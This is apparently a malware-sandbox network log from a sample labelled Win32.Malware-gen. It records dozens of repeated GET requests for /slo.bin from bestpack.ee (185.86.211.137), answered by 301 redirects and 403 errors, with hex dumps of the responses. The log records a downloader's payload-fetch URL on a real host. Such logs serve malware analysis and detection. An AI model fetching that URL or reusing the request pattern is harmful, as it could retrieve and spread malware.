Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.11.20 | 49820 | 185.86.211.137 | 80 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 19:04:29.031594038 CEST | 163 | OUT | GET /slo.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: bestpack.ee
Cache-Control: no-cache
Sep 27, 2024 19:04:29.252845049 CEST | 427 | IN | HTTP/1.1 301 Moved Permanently
Date: Fri, 27 Sep 2024 17:04:29 GMT
Server: Apache
Location: https://bestpack.ee/slo.bin
Content-Length: 235
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.11.20 | 49822 | 185.86.211.137 | 80 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 19:04:40.389682055 CEST | 163 | OUT | GET /slo.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: bestpack.ee
Cache-Control: no-cache
Sep 27, 2024 19:04:40.607471943 CEST | 427 | IN | HTTP/1.1 301 Moved Permanently
Date: Fri, 27 Sep 2024 17:04:40 GMT
Server: Apache
Location: https://bestpack.ee/slo.bin
Content-Length: 235
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.11.20 | 49824 | 185.86.211.137 | 80 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 19:04:51.732355118 CEST | 163 | OUT | GET /slo.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: bestpack.ee
Cache-Control: no-cache
Sep 27, 2024 19:04:51.950937033 CEST | 427 | IN | HTTP/1.1 301 Moved Permanently
Date: Fri, 27 Sep 2024 17:04:51 GMT
Server: Apache
Location: https://bestpack.ee/slo.bin
Content-Length: 235
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.11.20 | 49826 | 185.86.211.137 | 80 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 19:05:03.055321932 CEST | 163 | OUT | GET /slo.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: bestpack.ee
Cache-Control: no-cache
Sep 27, 2024 19:05:03.272316933 CEST | 427 | IN | HTTP/1.1 301 Moved Permanently
Date: Fri, 27 Sep 2024 17:05:03 GMT
Server: Apache
Location: https://bestpack.ee/slo.bin
Content-Length: 235
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.11.20 | 49828 | 185.86.211.137 | 80 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 19:05:14.382500887 CEST | 163 | OUT | GET /slo.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: bestpack.ee
Cache-Control: no-cache
Sep 27, 2024 19:05:14.600861073 CEST | 427 | IN | HTTP/1.1 301 Moved Permanently
Date: Fri, 27 Sep 2024 17:05:14 GMT
Server: Apache
Location: https://bestpack.ee/slo.bin
Content-Length: 235
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.11.20 | 49830 | 185.86.211.137 | 80 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 19:05:25.727962971 CEST | 163 | OUT | GET /slo.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: bestpack.ee
Cache-Control: no-cache
Sep 27, 2024 19:05:25.949950933 CEST | 427 | IN | HTTP/1.1 301 Moved Permanently
Date: Fri, 27 Sep 2024 17:05:25 GMT
Server: Apache
Location: https://bestpack.ee/slo.bin
Content-Length: 235
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.11.20 | 49832 | 185.86.211.137 | 80 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 19:05:37.082010031 CEST | 163 | OUT | GET /slo.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: bestpack.ee
Cache-Control: no-cache
Sep 27, 2024 19:05:37.303551912 CEST | 427 | IN | HTTP/1.1 301 Moved Permanently
Date: Fri, 27 Sep 2024 17:05:37 GMT
Server: Apache
Location: https://bestpack.ee/slo.bin
Content-Length: 235
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.11.20 | 49834 | 185.86.211.137 | 80 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 19:05:48.442399979 CEST | 163 | OUT | GET /slo.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: bestpack.ee
Cache-Control: no-cache
Sep 27, 2024 19:05:48.669481039 CEST | 427 | IN | HTTP/1.1 301 Moved Permanently
Date: Fri, 27 Sep 2024 17:05:48 GMT
Server: Apache
Location: https://bestpack.ee/slo.bin
Content-Length: 235
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.11.20 | 49836 | 185.86.211.137 | 80 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 19:05:59.792244911 CEST | 163 | OUT | GET /slo.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: bestpack.ee
Cache-Control: no-cache
Sep 27, 2024 19:06:00.009735107 CEST | 427 | IN | HTTP/1.1 301 Moved Permanently
Date: Fri, 27 Sep 2024 17:05:59 GMT
Server: Apache
Location: https://bestpack.ee/slo.bin
Content-Length: 235
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      39 | 192.168.11.20 | 49838 | 185.86.211.137 | 80 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Sep 27, 2024 19:06:11.117706060 CEST | 163 | OUT | GET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Host: bestpack.ee
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 27, 2024 19:06:11.334454060 CEST | 427 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 17:06:11 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      40 | 192.168.11.20 | 49840 | 185.86.211.137 | 80 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Sep 27, 2024 19:06:22.460724115 CEST | 163 | OUT | GET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Host: bestpack.ee
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 27, 2024 19:06:22.679668903 CEST | 427 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 17:06:22 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      41 | 192.168.11.20 | 49842 | 185.86.211.137 | 80 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Sep 27, 2024 19:06:33.788108110 CEST | 163 | OUT | GET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Host: bestpack.ee
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 27, 2024 19:06:34.009402990 CEST | 427 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 17:06:33 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      0 | 192.168.11.20 | 49761 | 185.86.211.137 | 443 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-09-27 16:58:48 UTC | 187 | OUT | GET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: bestpack.ee
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-09-27 16:58:48 UTC | 163 | IN | HTTP/1.1 403 Forbidden
                                                                                                                      Date: Fri, 27 Sep 2024 16:58:48 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 83
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      2024-09-27 16:58:48 UTC | 83 | IN | Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      1 | 192.168.11.20 | 49763 | 185.86.211.137 | 443 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-09-27 16:58:59 UTC | 187 | OUT | GET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: bestpack.ee
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-09-27 16:59:00 UTC | 163 | IN | HTTP/1.1 403 Forbidden
                                                                                                                      Date: Fri, 27 Sep 2024 16:58:59 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 83
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      2024-09-27 16:59:00 UTC | 83 | IN | Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      2 | 192.168.11.20 | 49765 | 185.86.211.137 | 443 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-09-27 16:59:10 UTC | 187 | OUT | GET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: bestpack.ee
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-09-27 16:59:11 UTC | 163 | IN | HTTP/1.1 403 Forbidden
                                                                                                                      Date: Fri, 27 Sep 2024 16:59:11 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 83
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      2024-09-27 16:59:11 UTC | 83 | IN | Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      3 | 192.168.11.20 | 49767 | 185.86.211.137 | 443 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-09-27 16:59:22 UTC | 187 | OUT | GET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: bestpack.ee
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-09-27 16:59:22 UTC | 163 | IN | HTTP/1.1 403 Forbidden
                                                                                                                      Date: Fri, 27 Sep 2024 16:59:22 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 83
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      2024-09-27 16:59:22 UTC | 83 | IN | Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      4 | 192.168.11.20 | 49769 | 185.86.211.137 | 443 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-09-27 16:59:33 UTC | 187 | OUT | GET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: bestpack.ee
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-09-27 16:59:34 UTC | 163 | IN | HTTP/1.1 403 Forbidden
                                                                                                                      Date: Fri, 27 Sep 2024 16:59:34 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 83
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      2024-09-27 16:59:34 UTC | 83 | IN | Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      5 | 192.168.11.20 | 49771 | 185.86.211.137 | 443 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-09-27 16:59:45 UTC | 187 | OUT | GET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: bestpack.ee
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-09-27 16:59:45 UTC | 163 | IN | HTTP/1.1 403 Forbidden
                                                                                                                      Date: Fri, 27 Sep 2024 16:59:45 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 83
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      2024-09-27 16:59:45 UTC | 83 | IN | Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      6 | 192.168.11.20 | 49773 | 185.86.211.137 | 443 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-09-27 16:59:56 UTC | 187 | OUT | GET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: bestpack.ee
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-09-27 16:59:56 UTC | 163 | IN | HTTP/1.1 403 Forbidden
                                                                                                                      Date: Fri, 27 Sep 2024 16:59:56 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 83
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      2024-09-27 16:59:56 UTC | 83 | IN | Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      7 | 192.168.11.20 | 49775 | 185.86.211.137 | 443 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-09-27 17:00:07 UTC | 187 | OUT | GET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: bestpack.ee
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-09-27 17:00:08 UTC | 163 | IN | HTTP/1.1 403 Forbidden
                                                                                                                      Date: Fri, 27 Sep 2024 17:00:08 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 83
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      2024-09-27 17:00:08 UTC83INData Raw: 3c 63 65 6e 74 65 72 3e 3c 62 72 20 2f 3e 3c 62 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 62 3e 3c 62 72 20 2f 3e 57 57 57 20 41 63 63 65 73 73 20 62 6c 6f 63 6b 65 64 20 2d 20 62 61 64 20 71 75 65 72 79 2f 75 72 6c 3c 2f 63 65 6e 74 65 72 3e
                                                                                                                      Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.11.20 | 49777 | 185.86.211.137 | 443 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 17:00:19 UTC | 187 | OUT | GET /slo.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Cache-Control: no-cache
Host: bestpack.ee
Connection: Keep-Alive
2024-09-27 17:00:19 UTC | 163 | IN | HTTP/1.1 403 Forbidden
Date: Fri, 27 Sep 2024 17:00:19 GMT
Server: Apache
Content-Length: 83
Connection: close
Content-Type: text/html; charset=iso-8859-1
2024-09-27 17:00:19 UTC | 83 | IN | Data Raw: 3c 63 65 6e 74 65 72 3e 3c 62 72 20 2f 3e 3c 62 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 62 3e 3c 62 72 20 2f 3e 57 57 57 20 41 63 63 65 73 73 20 62 6c 6f 63 6b 65 64 20 2d 20 62 61 64 20 71 75 65 72 79 2f 75 72 6c 3c 2f 63 65 6e 74 65 72 3e
Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.11.20 | 49779 | 185.86.211.137 | 443 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 17:00:30 UTC | 187 | OUT | GET /slo.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Cache-Control: no-cache
Host: bestpack.ee
Connection: Keep-Alive
2024-09-27 17:00:31 UTC | 163 | IN | HTTP/1.1 403 Forbidden
Date: Fri, 27 Sep 2024 17:00:31 GMT
Server: Apache
Content-Length: 83
Connection: close
Content-Type: text/html; charset=iso-8859-1
2024-09-27 17:00:31 UTC | 83 | IN | Data Raw: 3c 63 65 6e 74 65 72 3e 3c 62 72 20 2f 3e 3c 62 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 62 3e 3c 62 72 20 2f 3e 57 57 57 20 41 63 63 65 73 73 20 62 6c 6f 63 6b 65 64 20 2d 20 62 61 64 20 71 75 65 72 79 2f 75 72 6c 3c 2f 63 65 6e 74 65 72 3e
Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.11.20 | 49781 | 185.86.211.137 | 443 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 17:00:42 UTC | 187 | OUT | GET /slo.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Cache-Control: no-cache
Host: bestpack.ee
Connection: Keep-Alive
2024-09-27 17:00:42 UTC | 163 | IN | HTTP/1.1 403 Forbidden
Date: Fri, 27 Sep 2024 17:00:42 GMT
Server: Apache
Content-Length: 83
Connection: close
Content-Type: text/html; charset=iso-8859-1
2024-09-27 17:00:42 UTC | 83 | IN | Data Raw: 3c 63 65 6e 74 65 72 3e 3c 62 72 20 2f 3e 3c 62 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 62 3e 3c 62 72 20 2f 3e 57 57 57 20 41 63 63 65 73 73 20 62 6c 6f 63 6b 65 64 20 2d 20 62 61 64 20 71 75 65 72 79 2f 75 72 6c 3c 2f 63 65 6e 74 65 72 3e
Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.11.20 | 49783 | 185.86.211.137 | 443 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 17:00:53 UTC | 187 | OUT | GET /slo.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Cache-Control: no-cache
Host: bestpack.ee
Connection: Keep-Alive
2024-09-27 17:00:54 UTC | 163 | IN | HTTP/1.1 403 Forbidden
Date: Fri, 27 Sep 2024 17:00:53 GMT
Server: Apache
Content-Length: 83
Connection: close
Content-Type: text/html; charset=iso-8859-1
2024-09-27 17:00:54 UTC | 83 | IN | Data Raw: 3c 63 65 6e 74 65 72 3e 3c 62 72 20 2f 3e 3c 62 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 62 3e 3c 62 72 20 2f 3e 57 57 57 20 41 63 63 65 73 73 20 62 6c 6f 63 6b 65 64 20 2d 20 62 61 64 20 71 75 65 72 79 2f 75 72 6c 3c 2f 63 65 6e 74 65 72 3e
Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.11.20 | 49785 | 185.86.211.137 | 443 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 17:01:04 UTC | 187 | OUT | GET /slo.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Cache-Control: no-cache
Host: bestpack.ee
Connection: Keep-Alive
2024-09-27 17:01:05 UTC | 163 | IN | HTTP/1.1 403 Forbidden
Date: Fri, 27 Sep 2024 17:01:05 GMT
Server: Apache
Content-Length: 83
Connection: close
Content-Type: text/html; charset=iso-8859-1
2024-09-27 17:01:05 UTC | 83 | IN | Data Raw: 3c 63 65 6e 74 65 72 3e 3c 62 72 20 2f 3e 3c 62 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 62 3e 3c 62 72 20 2f 3e 57 57 57 20 41 63 63 65 73 73 20 62 6c 6f 63 6b 65 64 20 2d 20 62 61 64 20 71 75 65 72 79 2f 75 72 6c 3c 2f 63 65 6e 74 65 72 3e
Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.11.20 | 49787 | 185.86.211.137 | 443 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 17:01:16 UTC | 187 | OUT | GET /slo.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Cache-Control: no-cache
Host: bestpack.ee
Connection: Keep-Alive
2024-09-27 17:01:16 UTC | 163 | IN | HTTP/1.1 403 Forbidden
Date: Fri, 27 Sep 2024 17:01:16 GMT
Server: Apache
Content-Length: 83
Connection: close
Content-Type: text/html; charset=iso-8859-1
